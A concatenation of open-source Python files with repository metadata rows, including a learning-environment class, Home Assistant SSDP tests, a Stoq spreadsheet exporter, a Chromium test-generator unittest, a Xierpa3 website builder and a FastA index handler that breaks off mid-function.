xTest = read_data("test", labelsInfoTest, imageSize, path)
yTrain = map(ord, labelsInfoTrain["Class"])
yTrain = np.array(yTrain)
# Importing main functions
from sklearn.cross_validation import cross_val_score as k_fold_CV
from sklearn.neighbors import KNeighborsClassifier as KNN
from sklearn.grid_search import GridSearchCV
# Running LOOF-CV with 1NN sequentially
import time
start = time.time()
model = KNN(n_neighbors=1)
cvAccuracy = np.mean(k_fold_CV(model, xTrain, yTrain, cv=2, scoring="accuracy"))
print "The 2-CV accuracy of 1NN", cvAccuracy
print time.time() - start, "seconds elapsed"
# Tuning the value for k
start = time.time()
tuned_parameters = [{"n_neighbors":list(range(1,5))}]
clf = GridSearchCV( model, tuned_parameters, cv=5, scoring="accuracy")
clf.fit(xTrain, yTrain)
print clf.grid_scores_
print time.time() - start, "seconds elapsed"
| mit | 3,464,750,835,726,655,000 | 27.639344 | 80 | 0.734402 | false | 3.038261 | true | false | false |
general-ai-challenge/Round1 | src/core/environment.py | 1 | 14751 | # Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from core.events import EventManager
from core.task import StateChanged, MessageReceived, \
SequenceReceived, OutputSequenceUpdated, OutputMessageUpdated
from core.obs.observer import Observable
from core.serializer import ScramblingSerializerWrapper
from core.channels import InputChannel, OutputChannel
from core.byte_channels import ByteInputChannel, ByteOutputChannel
from collections import defaultdict
import logging
class Environment:
'''
The Environment is the one that communicates with the Learner,
interpreting its output and reacting to it. The interaction is governed
by an ongoing task which is picked by a TaskScheduler object.
:param serializer: a Serializer object that translates text into binary and
back.
:param task_scheduler: a TaskScheduler object that determines which task
is going to be run next.
:param scramble: if True, the words outputted by the tasks are randomly
scrambled.
:param max_reward_per_task: maximum amount of reward that a learner can
receive for a given task.
'''
def __init__(self, serializer, task_scheduler, scramble=False,
max_reward_per_task=10000, byte_mode=False):
# save parameters into member variables
self._task_scheduler = task_scheduler
self._serializer = serializer
self._max_reward_per_task = max_reward_per_task
# cumulative reward per task
self._reward_per_task = defaultdict(int)
# the event manager is the controller that dispatches
# changes in the environment (like new inputs or state changes)
# to handler functions in the tasks that tell the environment
# how to react
self.event_manager = EventManager()
# intialize member variables
self._current_task = None
self._current_world = None
if scramble:
serializer = ScramblingSerializerWrapper(serializer)
if byte_mode:
# we hear to our own output
self._output_channel_listener = ByteInputChannel(serializer)
# output channel
self._output_channel = ByteOutputChannel(serializer)
# input channel
self._input_channel = ByteInputChannel(serializer)
else:
# we hear to our own output
self._output_channel_listener = InputChannel(serializer)
# output channel
self._output_channel = OutputChannel(serializer)
# input channel
self._input_channel = InputChannel(serializer)
# priority of ongoing message
self._output_priority = 0
# reward that is to be given at the learner at the end of the task
self._reward = None
self._result = None
self._last_result = None
# reward that is to be given immediately
self._immediate_reward = None
# Current task time
self._task_time = None
# Task separator issued
self._task_separator_issued = False
# Internal logger
self.logger = logging.getLogger(__name__)
# signals
self.world_updated = Observable()
self.task_updated = Observable()
# Register channel observers
self._input_channel.sequence_updated.register(
self._on_input_sequence_updated)
self._input_channel.message_updated.register(
self._on_input_message_updated)
self._output_channel_listener.sequence_updated.register(
self._on_output_sequence_updated)
self._output_channel_listener.message_updated.register(
self._on_output_message_updated)
def next(self, learner_input):
'''Main loop of the Environment. Receives one bit from the learner and
produces a response (also one bit)'''
self._last_result = None # will be set while execution is inside this function or its child tree
# Make sure we have a task
if not self._current_task:
self._switch_new_task()
# If the task has not reached the end by either Timeout or
# achieving the goal
if not self._current_task.has_ended():
reward = None
# Check if a Timeout occurred
self._current_task.check_timeout(self._task_time)
# Process the input from the learner and raise events
if learner_input is not None:
# record the input from the learner and deserialize it
# TODO this bit is dropped otherwise on a timeout...
self._input_channel.consume(learner_input)
# switch to next task immediately if this input caused the task to end
# and there is no feedback to output (output_channel is empty)
if self._current_task.has_ended() and self._output_channel.is_empty():
self._switch_new_task()
# We are in the middle of the task, so no rewards are given
else:
# If the task is ended and there is nothing else to say,
# issue a silence and then return reward and move to next task
if self._output_channel.is_empty():
if self._task_separator_issued or self._should_skip_separator():
# Have nothing more to say
# reward the learner if necessary and switch to new task
reward = self._reward if self._reward is not None else 0
self._switch_new_task()
self._task_separator_issued = False
else:
self._output_channel.set_message(
self._serializer.SILENCE_TOKEN)
self._task_separator_issued = True
reward = None
else:
# TODO: decide what to do here.
# Should we consume the bit or not?
self._input_channel.consume(learner_input)
# If there is still something to say, continue saying it
reward = None
# Get one bit from the output buffer and ship it
if self._output_channel.is_empty():
self._output_channel.set_message(self._serializer.SILENCE_TOKEN)
output = self._output_channel.consume()
# we hear to ourselves
self._output_channel_listener.consume(output)
# advance time
self._task_time += 1
if self._immediate_reward is not None and reward is None:
reward = self._immediate_reward
self._immediate_reward = None
if reward is not None:
# process the reward (clearing it if it's not allowed)
reward = self._allowable_reward(reward)
else:
reward = 0
return output, reward
def get_reward_per_task(self):
'''
Returns a dictonary that contains the cumulative reward for each
task.
'''
return self._reward_per_task
def _allowable_reward(self, reward):
'''Checks if the reward is allowed within the limits of the
`max_reward_per_task` parameter, and resets it to 0 if not.'''
task_name = self._current_task.get_name()
if self._reward_per_task[task_name] < self._max_reward_per_task:
self._reward_per_task[task_name] += reward
return reward
else:
return 0
def is_silent(self):
'''
Tells if the environment is sending any information through the output
channel.
'''
return self._output_channel.is_silent()
def _on_input_sequence_updated(self, sequence):
if self.event_manager.raise_event(SequenceReceived(sequence)):
self.logger.debug("Sequence received by running task: '{0}'".format(
sequence))
def _on_input_message_updated(self, message):
# send the current received message to the task
if self.event_manager.raise_event(MessageReceived(
message)):
self.logger.debug("Message received by running task: '{0}'".format(
message))
def _on_output_sequence_updated(self, sequence):
self.event_manager.raise_event(OutputSequenceUpdated(sequence))
def _on_output_message_updated(self, message):
self.event_manager.raise_event(OutputMessageUpdated(message))
def _should_skip_separator(self):
return hasattr(self._current_task, 'skip_task_separator') and self._current_task.skip_task_separator
def set_result(self, result, message='', priority=0, provide_result_as_reward=True):
# the following two ifs prevent repeating the same feedback ad infinitum, which otherwise happens in mini-tasks
# in case of a repeated invalid input. self._result is set back to None every time a new task is switched.
if self._result is True and result is True:
return
if self._result is False and result is False:
return
if provide_result_as_reward:
self._reward = result
self._result = result
self._current_task.end()
self.logger.debug('Terminating instance with result {0} with message "{1}"'
' and priority {2}'
.format(result, message, priority))
# adds a final space to the final message of the task
# to separate the next task instructions
self.set_message(message, priority)
def set_immediate_reward(self, reward):
'''Sets the reward immediately'''
self._immediate_reward = reward
self.logger.debug('Setting immediate reward {}'.format(reward))
def set_message(self, message, priority=0):
''' Saves the message in the output buffer so it can be delivered
bit by bit. It overwrites any previous content.
'''
if self._output_channel.is_empty() or priority >= self._output_priority:
self.logger.debug('Setting message "{0}" with priority {1}'
.format(message, priority))
self._output_channel.set_message(message)
self._output_priority = priority
else:
self.logger.info(
'Message "{0}" blocked because of '
'low priority ({1}<{2}) '.format(
message, priority, self._output_priority)
)
def raise_event(self, event):
return self.event_manager.raise_event(event)
def raise_state_changed(self):
'''
This rases a StateChanged Event, meaning that something
in the state of the world or the tasks changed (but we
don't keep track what)
'''
# state changed events can only be raised if the current task is
# started
if self._current_task and self._current_task.has_started():
# tasks that have a world should also take the world state as
# an argument
if self._current_world:
self.raise_event(StateChanged(
self._current_world.state, self._current_task.state))
else:
self.raise_event(StateChanged(self._current_task.state))
return True
return False
def _switch_new_task(self):
'''
Asks the task scheduler for a new task,
reset buffers and time, and registers the event handlers
'''
# deregister previous event managers
if self._current_task:
self._current_task.deinit()
self._deregister_task_triggers(self._current_task)
# pick a new task
if self._result != None:
self._last_result = self._result
self._task_scheduler.reward(self._result)
self._result = None
self._current_task = self._task_scheduler.get_next_task()
try:
# This is to check whether the user didn't mess up in instantiating
# the class
self._current_task.get_world()
except TypeError:
raise RuntimeError("The task {0} is not correctly instantiated. "
"Are you sure you are not forgetting to "
"instantiate the class?".format(
self._current_task))
self.logger.debug("Starting new task: {0}".format(self._current_task))
# check if it has a world:
if self._current_task.get_world() != self._current_world:
# if we had an ongoing world, end it.
if self._current_world:
self._current_world.end()
self._deregister_task_triggers(self._current_world)
self._current_world = self._current_task.get_world()
if self._current_world:
# register new event handlers for the world
self._register_task_triggers(self._current_world)
# initialize the new world
self._current_world.start(self)
self.world_updated(self._current_world)
# reset state
self._task_time = 0
self._reward = None
self._input_channel.clear()
self._output_channel.clear()
self._output_channel_listener.clear()
# register new event handlers
self._register_task_triggers(self._current_task)
# start the task, sending the current environment
# so it can interact by sending back rewards and messages
self._current_task.start(self)
self.task_updated(self._current_task)
def _deregister_task_triggers(self, task):
for trigger in task.get_triggers():
try:
self.event_manager.deregister(task, trigger)
except ValueError:
# if the trigger was not registered, we don't worry about it
pass
except KeyError:
# if the trigger was not registered, we don't worry about it
pass
task.clean_dynamic_handlers()
def _register_task_triggers(self, task):
for trigger in task.get_triggers():
self._register_task_trigger(task, trigger)
def _register_task_trigger(self, task, trigger):
self.event_manager.register(task, trigger)
| bsd-3-clause | 5,099,730,751,178,480,000 | 41.510086 | 119 | 0.610128 | false | 4.56546 | false | false | false |
tboyce021/home-assistant | tests/components/ssdp/test_init.py | 2 | 4786 | """Test the SSDP integration."""
import asyncio
from unittest.mock import Mock, patch
import aiohttp
import pytest
from homeassistant.components import ssdp
from tests.common import mock_coro
async def test_scan_match_st(hass, caplog):
"""Test matching based on ST."""
scanner = ssdp.Scanner(hass, {"mock-domain": [{"st": "mock-st"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[
Mock(
st="mock-st",
location=None,
values={"usn": "mock-usn", "server": "mock-server", "ext": ""},
)
],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
assert mock_init.mock_calls[0][2]["data"] == {
ssdp.ATTR_SSDP_ST: "mock-st",
ssdp.ATTR_SSDP_LOCATION: None,
ssdp.ATTR_SSDP_USN: "mock-usn",
ssdp.ATTR_SSDP_SERVER: "mock-server",
ssdp.ATTR_SSDP_EXT: "",
}
assert "Failed to fetch ssdp data" not in caplog.text
@pytest.mark.parametrize(
"key", (ssdp.ATTR_UPNP_MANUFACTURER, ssdp.ATTR_UPNP_DEVICE_TYPE)
)
async def test_scan_match_upnp_devicedesc(hass, aioclient_mock, key):
"""Test matching based on UPnP device description data."""
aioclient_mock.get(
"http://1.1.1.1",
text=f"""
<root>
<device>
<{key}>Paulus</{key}>
</device>
</root>
""",
)
scanner = ssdp.Scanner(hass, {"mock-domain": [{key: "Paulus"}]})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert len(mock_init.mock_calls) == 1
assert mock_init.mock_calls[0][1][0] == "mock-domain"
assert mock_init.mock_calls[0][2]["context"] == {"source": "ssdp"}
async def test_scan_not_all_present(hass, aioclient_mock):
"""Test match fails if some specified attributes are not present."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>
<device>
<deviceType>Paulus</deviceType>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
async def test_scan_not_all_match(hass, aioclient_mock):
"""Test match fails if some specified attribute values differ."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>
<device>
<deviceType>Paulus</deviceType>
<manufacturer>Paulus</manufacturer>
</device>
</root>
""",
)
scanner = ssdp.Scanner(
hass,
{
"mock-domain": [
{
ssdp.ATTR_UPNP_DEVICE_TYPE: "Paulus",
ssdp.ATTR_UPNP_MANUFACTURER: "Not-Paulus",
}
]
},
)
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
), patch.object(
hass.config_entries.flow, "async_init", return_value=mock_coro()
) as mock_init:
await scanner.async_scan(None)
assert not mock_init.mock_calls
@pytest.mark.parametrize("exc", [asyncio.TimeoutError, aiohttp.ClientError])
async def test_scan_description_fetch_fail(hass, aioclient_mock, exc):
"""Test failing to fetch description."""
aioclient_mock.get("http://1.1.1.1", exc=exc)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
async def test_scan_description_parse_fail(hass, aioclient_mock):
"""Test invalid XML."""
aioclient_mock.get(
"http://1.1.1.1",
text="""
<root>INVALIDXML
""",
)
scanner = ssdp.Scanner(hass, {})
with patch(
"netdisco.ssdp.scan",
return_value=[Mock(st="mock-st", location="http://1.1.1.1", values={})],
):
await scanner.async_scan(None)
| apache-2.0 | 5,570,147,458,681,157,000 | 26.825581 | 80 | 0.568533 | false | 3.207775 | true | false | false |
tiagocardosos/stoq | stoqlib/gui/dialogs/spreadsheetexporterdialog.py | 2 | 3749 | # -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2008-2012 Async Open Source <http://www.async.com.br>
## All rights reserved
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
## Author(s): Stoq Team <[email protected]>
##
"""Spreedsheet Exporter Dialog"""
import gio
import gtk
from stoqlib.api import api
from stoqlib.exporters.xlsexporter import XLSExporter
from stoqlib.lib.message import yesno
from stoqlib.lib.translation import stoqlib_gettext
_ = stoqlib_gettext
class SpreadSheetExporter:
"""A dialog to export data to a spreadsheet
"""
title = _('Exporter to Spreadseet')
def export(self, object_list, name, filename_prefix, data=None):
xls = XLSExporter(name)
xls.add_from_object_list(object_list, data)
temporary = xls.save(filename_prefix)
self.export_temporary(temporary)
def export_temporary(self, temporary):
mime_type = 'application/vnd.ms-excel'
app_info = gio.app_info_get_default_for_type(mime_type, False)
if app_info:
action = api.user_settings.get('spreadsheet-action')
if action is None:
action = 'open'
else:
action = 'save'
if action == 'ask':
action = self._ask(app_info)
if action == 'open':
temporary.close()
self._open_application(mime_type, temporary.name)
elif action == 'save':
self._save(temporary)
def _ask(self, app_info):
# FIXME: What if the user presses esc? Esc will return False
# and open action will be executed. Esc should cancel the action
if yesno(_("A spreadsheet has been created, "
"what do you want to do with it?"),
gtk.RESPONSE_NO,
_('Save it to disk'),
_("Open with %s") % (app_info.get_name())):
return 'save'
else:
return 'open'
def _open_application(self, mime_type, filename):
app_info = gio.app_info_get_default_for_type(mime_type, False)
gfile = gio.File(path=filename)
app_info.launch([gfile])
def _save(self, temp):
chooser = gtk.FileChooserDialog(
_("Export Spreadsheet..."), None,
gtk.FILE_CHOOSER_ACTION_SAVE,
(gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL,
gtk.STOCK_SAVE, gtk.RESPONSE_OK))
chooser.set_do_overwrite_confirmation(True)
xls_filter = gtk.FileFilter()
xls_filter.set_name(_('Excel Files'))
xls_filter.add_pattern('*.xls')
chooser.add_filter(xls_filter)
response = chooser.run()
filename = None
if response != gtk.RESPONSE_OK:
chooser.destroy()
return
filename = chooser.get_filename()
ext = '.xls'
chooser.destroy()
if not filename.endswith(ext):
filename += ext
# Open in binary format so windows dont replace '\n' with '\r\n'
open(filename, 'wb').write(temp.read())
temp.close()
| gpl-2.0 | 3,608,650,358,370,720,000 | 31.318966 | 78 | 0.616164 | false | 3.779234 | false | false | false |
chromium/chromium | chrome/test/webapps/generate_framework_tests_and_coverage_unittest.py | 1 | 2889 | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from io import StringIO
import os
import sys
import unittest
import tempfile
from generate_framework_tests_and_coverage import generate_framework_tests_and_coverage
from models import TestPartitionDescription
from models import TestPlatform
TEST_DATA_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_data")
class GenerateFrameworkTestsAndCoverageTest(unittest.TestCase):
def test_coverage(self):
actions_filename = os.path.join(TEST_DATA_DIR, "test_actions.csv")
coverage_filename = os.path.join(TEST_DATA_DIR,
"test_unprocessed_coverage.csv")
custom_partitions = [
TestPartitionDescription(
action_name_prefixes={"state_change_b"},
browsertest_dir=TEST_DATA_DIR,
test_file_prefix="tests_change_b",
test_fixture="TwoClientWebAppsIntegrationSyncTest")
]
default_partition = TestPartitionDescription(
action_name_prefixes=set(),
browsertest_dir=TEST_DATA_DIR,
test_file_prefix="tests_default",
test_fixture="WebAppIntegrationBrowserTest")
with open(actions_filename) as actions_file, \
open(coverage_filename) as coverage_file, \
tempfile.TemporaryDirectory() as output_dir:
capturedOutput = StringIO()
sys.stdout = capturedOutput
generate_framework_tests_and_coverage(actions_file, coverage_file,
custom_partitions,
default_partition,
output_dir, None)
# The framework uses stdout to inform the developer of tests that
# need to be added or removed. Since there should be no tests
# changes required, nothing should be printed to stdout.
self.assertFalse(capturedOutput.read())
sys.stdout = sys.__stdout__
for platform in TestPlatform:
file_title = "coverage" + platform.suffix + ".tsv"
gen_coverage_filename = os.path.join(output_dir, file_title)
expected_coverage_filename = os.path.join(
TEST_DATA_DIR, "expected_" + file_title)
with open(gen_coverage_filename) as coverage_file, \
open(expected_coverage_filename) as expected_file:
self.assertListEqual(list(coverage_file.readlines()),
list(expected_file.readlines()))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 7,397,029,959,659,532,000 | 42.772727 | 87 | 0.591208 | false | 4.728314 | true | false | false |
petrvanblokland/Xierpa3 | xierpa3/sites/examples/dbdwebsite/make.py | 1 | 6285 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
# Demo site for the simple "BasicWebsite" example.
# Each of the builders takes the information from the theme to build its
# own type of file.
#
import webbrowser
from xierpa3.attributes import Color, Em, Perc
from xierpa3.components import Theme, Page, Column, Logo, Menu, MobileNavigation, Container, Article, \
ArticleSideBar, Footer, FeaturedByImage, FeaturedByDiapText, FeaturedByText, FeaturedByImageList, \
ArticlesList, PosterHead
from xierpa3.descriptors.blueprint import BluePrint
from xierpa3.descriptors.media import Media
from xierpa3.toolbox.transformer import TX
from xierpa3.adapters.textilefileadapter import TextileFileAdapter
# Load @fontface fonts for this example from www.webtype.com
BODYFAMILY = '"Benton Sans RE", Verdana, sans'
HEADFAMILY = '"Hermes FB Semibold", Impact, Verdana, sans'
class Top(Container):
BLUEPRINT = BluePrint(MobileNavigation.BLUEPRINT,
# Layout alternatives
backgroundColor=Color('#fff'), doc_backgroundColor='Top background color.',
)
class Navigation(Column):
def buildBlock(self, b):
b.div(class_='navigation', marginbottom=Em(2), paddingright=Em(1), backgroundcolor=Color('#EEE'))
for article in self.adapter.getRankedArticles():
if article.title:
b.a(href='/article-%s' % article.id, fontsize=Em(0.8), marginright=Em(1), color=Color('#888'))
b.text(article.title)
b._a()
else:
b.text('No title for article "%s"' % article.id)
b.br()
b._div()
class DbdWebsite(Theme):
u"""The *DbdWebsite* generates the DoingByDesign website from a given adapter with all navigation
and content in place. The styling is not different from default (no additional styling added,
except what is already defined the @component.BLUEPRINT@."""
C = Theme.C
TITLE = u'Doing by Design' # Use as title of window.
XIERPA3_DEMOFONTS = "//cloud.webtype.com/css/34d3e5fe-7dee-4122-9e87-ea5ee4a90a05.css"
URL_FONTS = [
# Note that this package contains the a set of latest featured font, and may be changed in the future.
# If using the font in this package, safest is to refer to the functional constant names below,
# instead of making a direct reference to the family name.
# Of course, taking your own account at //www.webtype.com is even better :)
XIERPA3_DEMOFONTS, # Webtype @fontface fonts, to be used for localhost demo purposes.
]
# The single column is filled by the self.adapter article query result and standard navigation.
# The default b.adapter taks the articles from the DbD site.
def baseStyle(self):
u"""Answer the single basis style that will be defined as overall CSS, before
specific block definitions start."""
s = Article.BLUEPRINT
root = self.newStyle() # Create root style
root.addStyle('body', fontfamily=BODYFAMILY, fontsize=s.fontSize,
backgroundcolor=s.pageBackgroundColor, lineheight=s.lineHeight)
s.addStyle('h1, h2, h3, h4, h5, p.lead', fontfamily=HEADFAMILY)
s.addStyle('h6', fontfamily=BODYFAMILY)
s.addStyle('b', fontweight=self.C.BOLD)
s.addStyle('a', color=Color('#CECECE'))
return root
def getSiteAdapter(self):
u"""Answer the adapter for this site, including all articles of the DbD site."""
from xierpa3.sites import doingbydesign
# Root path where to find the article Simples wiki file for this example page.
articleRoot = TX.module2Path(doingbydesign) + '/files/articles/'
return TextileFileAdapter(articleRoot) # Preferred adapter class for articles in this site.
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of components to be placed on the page.
# Import current example site, as anchor for the article files.
adapter = self.getSiteAdapter()
logo = Logo()
menu = Menu()
navigation = Navigation()
article = Article(showPoster=False) # No poster inside the article. We use the PosterHead component.
articleSideBar = ArticleSideBar(showChapterNavigation=True)
articlesList = ArticlesList()
posterhead = PosterHead() # Wordpress-like big picture from article.poster link.
featuredByImage = FeaturedByImage()
featuredByDiapText = FeaturedByDiapText()
featuredByText = FeaturedByText()
featuredByImageList = FeaturedByImageList()
# Containers for pages
top = Top(components=(logo, menu), media=Media(max=self.C.M_MOBILE_MAX, display=self.C.NONE))
homeContainer = Container(components=(featuredByDiapText, featuredByImage, featuredByText,
featuredByImageList))
articleContainer = Container(components=(posterhead, article, articleSideBar))
articlesListContainer = Container(articlesList,)
footer = Footer()
# Create an instance (=object) of the page, containing the navigation components.
# The class is also the page name in the url.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(top, homeContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlePage = Page(class_=self.C.TEMPLATE_ARTICLE, components=(top, articleContainer, footer), adapter=adapter,
title=self.TITLE, fonts=self.URL_FONTS)
articlesPage = Page(class_=self.C.TEMPLATE_ARTICLES, components=(top, articlesListContainer, footer),
adapter=adapter, title=self.TITLE, fonts=self.URL_FONTS)
# Answer a list of types of pages for this site. In this case just one template.
return [homePage, articlePage, articlesPage]
| mit | 374,267,383,479,881,200 | 47.346154 | 119 | 0.668417 | false | 3.813714 | false | false | false |
lpryszcz/bin | FastaIndex.py | 1 | 16107 | #!/usr/bin/env python2
desc="""FastA index (.fai) handler compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
.fai is extended with 4 columns storing counts for A, C, G & T for each sequence.
"""
epilog="""Author: [email protected]
Bratislava, 15/06/2016
"""
import os, sys
from datetime import datetime
def symlink(file1, file2):
"""Create symbolic link taking care of real path."""
if not os.path.isfile(file2):
# check if need for absolute path
file1abs = os.path.join(os.path.realpath(os.path.curdir), file1)
if os.path.isfile(file1abs):
os.symlink(file1abs, file2)
# otherwise create symbolic link without full path
else:
os.symlink(file1, file2)
class FastaIndex(object):
"""Facilitate Fasta index (.fai) operations compatible
with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
def __init__(self, handle, verbose=0, log=sys.stderr):
""" """
ext = ".fai"
self.verbose = verbose
self.log = log.write
self.genomeSize = 0
self.whitespaces_in_headers = False
# guess handle
if type(handle) is str and os.path.isfile(handle):
handle = open(handle)
if type(handle) is file:
if handle.name.endswith(('.gz','.bz')):
raise Exception("Compressed files are currently not supported!")
self.handle = handle
else:
sys.stderr.write("[ERROR] Couldn't guess handle for %s\n"%str(handle))
sys.exit(1)
self.fasta = self.handle.name
self.faidx = self.fasta + ext
# check if fasta is symlink
if not os.path.isfile(self.faidx) and os.path.islink(self.fasta):
_fasta = os.path.realpath(self.fasta)
_faidx = _fasta+ext
# symlink faidx if faidx exists and linked fasta is older than its faidx
if os.path.isfile(_faidx) and os.stat(_fasta).st_mtime < os.stat(_faidx).st_mtime:
symlink(_faidx, self.faidx)
# create new index if no .fai, .fai loading failed or .fai younger than .fasta
if not os.path.isfile(self.faidx) or not self._load_fai() or \
os.stat(self.fasta).st_mtime > os.stat(self.faidx).st_mtime:
self._generate_index()
# links
self.get = self.get_fasta
# init storage
self.base2rc= {"A": "T", "T": "A", "C": "G", "G": "C",
"a": "t", "t": "a", "c": "g", "g": "c",
"N": "N", "n": "n"}
# basecounts
self.basecounts = map(sum, zip(*[stats[-4:] for stats in self.id2stats.itervalues()]))
self.Ns = self.genomeSize - sum(self.basecounts)
def __process_seqentry(self, out, header, seq, offset, pi):
"""Write stats to file and report any issues"""
if header:
# get seqid and sequence stats
seqid = self.get_id(header)
# catch empty headers
if not seqid:
self.log("[WARNING] No header at line: %s\n"%", ".join(map(str, (pi,seqid,header))))
return
stats = self.get_stats(header, seq, offset)
# warn about empty sequences
if not stats[0]:
self.log("[WARNING] No sequence for: %s at line: %s\n"%(seqid, pi))
# catch duplicates
if seqid in self.id2stats:
self.log("[WARNING] Duplicated sequence ID: %s at line: %s\n"%(seqid, pi))
self.id2stats[seqid] = stats
out.write("%s\t%s\n"%(seqid, "\t".join(map(str, stats))))
def _generate_index(self):
"""Return fasta records"""
if self.verbose:
self.log("Generating FastA index...\n")
header, seq = "", []
offset = pi = 0
self.id2stats = {}
with open(self.faidx, 'w') as out:
for i, l in enumerate(iter(self.handle.readline, ''), 1):
if l.startswith(">"):
self.__process_seqentry(out, header, seq, offset, pi)
# mark that there is whitespace in headers
if len(l[:-1].split())>1:
self.whitespaces_in_headers = True
header = l
offset = self.handle.tell()
seq = []
pi = i
else:
seq.append(l)
# process last entry
self.__process_seqentry(out, header, seq, offset, pi)
def _load_fai(self):
"""Load stats from faidx file.
Return False if .fai is wrongly formatted.
"""
self.id2stats = {}
for l in open(self.faidx):
ldata = l[:-1].split('\t')
if len(ldata)<9:
self.whitespaces_in_headers = False
return
rid = ldata[0]
stats = map(int, ldata[1:])
self.id2stats[rid] = stats
# update genomeSize
self.genomeSize += stats[0]
if len(rid.split())>1:
self.whitespaces_in_headers = True
return True
def __len__(self):
"""How many records are there?"""
return len(self.id2stats)
def __iter__(self):
"""Iterate over the keys."""
for seqid in self.id2stats:
yield seqid
def __getitem__(self, key, start=None, stop=None, name=None, seqonly=False):
"""x.__getitem__(y) <==> x[y]"""
if key not in self.id2stats:
#raise KeyError
sys.stderr.write("[Warning] No such entry: %s\n"%key)
return ""
# get offset info
size, offset, linebases, linebytes = self.id2stats[key][:4]
# compute bytes to fetch
linediff = linebytes - linebases
seqid = key
# get sequence slice
if start and stop:
reverse_complement = 0
if start<1:
start = 1
seqid = "%s:%s-%s"%(key, start, stop)
if start>stop:
reverse_complement = 1
start, stop = stop, start
if stop > size:
stop = size
# 1-base, inclusive end
start -= 1
# get bytesize and update offset
offset += start / linebases * linebytes + start % linebases
realsize = stop-start
bytesize = realsize / linebases * linebytes + realsize % linebases
# read sequence slice
self.handle.seek(offset)
seq = self.handle.read(bytesize).replace('\n', '')
if reverse_complement:
seq = self.get_reverse_complement(seq)
if seqonly:
return seq
# format lines
seq = '\n'.join(seq[i:i+linebases] for i in range(0, len(seq), linebases))+'\n'
# load whole sequence record
else:
# get bytesize
bytesize = size / linebases * linebytes + size % linebases
## add line diff for last line only for multiline fasta if last line is not complete
if size / linebytes and size % linebases:
bytesize += linediff
# read entire sequence
self.handle.seek(offset)
seq = self.handle.read(bytesize)
if seqonly:
return "".join(seq.split('\n'))
# update name
if not name:
name = seqid
record = ">%s\n%s"%(name, seq)
return record
def get_reverse_complement(self, seq):
"""Return reverse complement"""
rc = []
for seqsegment in seq.split():
for b in seqsegment:
if b in self.base2rc:
rc.append(self.base2rc[b])
else:
rc.append(b)
return "".join(reversed(rc))
def get_sequence(self, contig, reverse=False):
"""Return sequence of given contig"""
seq = self.__getitem__(contig, seqonly=True)
if reverse:
return self.get_reverse_complement(seq)
return seq
def get_fasta(self, region="", contig="", start=None, stop=None, name=None):
"""Return FastA slice"""
if region:
if ':' in region:
#if '-' in region:
try:
contig, startstop = region.split(':')
start, stop = map(int, startstop.split('-'))
except Exception:
raise Exception("Malformed region definition: %s, while expected contig:start-stop"%region)
else:
contig = region
elif not contig:
self.log("Provide region or contig!\n")
return
# get record
record = self.__getitem__(contig, start, stop, name)
return record
def get_id(self, header):
"""Return seqid from header"""
# catch empty headers
if len(header.strip())<2:
return
return header[1:].split()[0]
def get_stats(self, header, seq, offset):
"""Return seq length, offset, linebases, linebyts and number of
A, C, G and T in each sequence.
Compatible with samtools faidx (http://www.htslib.org/doc/faidx.html).
"""
errors = 0
# get bases & bytes in line, ignoring last line
if len(seq)>1:
linebases = set(len(s.strip()) for s in seq[:-1])
linebytes = set(len(s) for s in seq[:-1])
if len(linebases)>1:
self.log("[WARNING] Uneven line lengths in %s: %s\n"%(header, ",".join(map(str, linebases))))
linebases, linebytes = max(linebases), max(linebytes)
